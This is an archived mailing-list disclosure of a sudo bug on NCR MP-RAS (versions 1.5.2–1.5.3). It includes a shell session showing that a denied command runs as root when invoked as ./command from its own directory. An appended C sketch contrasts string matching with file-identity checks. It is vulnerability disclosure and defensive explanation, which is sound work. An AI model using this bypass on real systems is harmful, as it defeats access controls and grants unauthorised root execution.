There is a bug in sudo versions (at least) 1.5.2 and 1.5.3 on NCR's MP-RAS that makes it trivial to bypass sudo's restrictions. I reported this to the sudo-bugs address given in the source on 12/23/97, but never heard back, so screw 'em.

It is important to note that MP-RAS is one of the platforms listed in the RUNSON file included with the distribution, so there are probably many people running this; I imagine you will want to reconsider it if you are one of them.

Basically, if you define a command that a user is not allowed to run, they will still be allowed to run it if they cd to the directory containing the command and preface it with ./. Here's an example:

    /da8 atlas> sudo date
    Sorry, user osiris is not allowed to execute "/usr/bin/date" as root on atlas.
    /da8 atlas> sudo /bin/date
    Sorry, user osiris is not allowed to execute "/bin/date" as root on atlas.
    /da8 atlas> cd /usr/bin
    /usr/bin atlas> sudo ./date
    Mon Jan 12 12:15:34 EST 1998

I'm not sure if this problem affects any other platforms. I believe HP-UX 9.04 at least is safe.

--jml
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:38:41 PDT
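The post does not say why the check fails on MP-RAS. As an added illustration (not part of the original message and not sudo's code), the sketch below shows the general failure class the session is consistent with: a deny rule matched against the command string as typed, next to a match on file identity. The function names are hypothetical and /bin/sh is a constructed stand-in for the denied command.

```c
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Flawed pattern: compare the command name exactly as the user typed it. */
int denied_by_string(const char *typed, const char *deny_entry)
{
    return strcmp(typed, deny_entry) == 0;
}

/* Safer pattern: compare file identity (device + inode), so "./x", a
 * symlinked directory or a hard link all resolve to the same denied file. */
int denied_by_identity(const char *typed, const char *deny_entry)
{
    struct stat t, d;

    if (stat(typed, &t) != 0)
        return 1;   /* cannot identify the command: refuse it */
    if (stat(deny_entry, &d) != 0)
        return 0;   /* denied file does not exist: nothing to match */
    return t.st_dev == d.st_dev && t.st_ino == d.st_ino;
}

int main(void)
{
    /* Constructed stand-in: /bin/sh plays the role of the denied command. */
    const char *deny = "/bin/sh";
    const char *typed[] = { "/bin/sh", "./sh" };

    if (chdir("/bin") != 0) {   /* same step as "cd /usr/bin" in the post */
        perror("chdir");
        return 1;
    }
    for (size_t i = 0; i < 2; i++)
        printf("%-8s string=%s identity=%s\n", typed[i],
               denied_by_string(typed[i], deny) ? "DENY" : "allow",
               denied_by_identity(typed[i], deny) ? "DENY" : "allow");
    return 0;
}
```

A real policy check also has to execute the same file it just identified, otherwise the path can be swapped between the check and the exec.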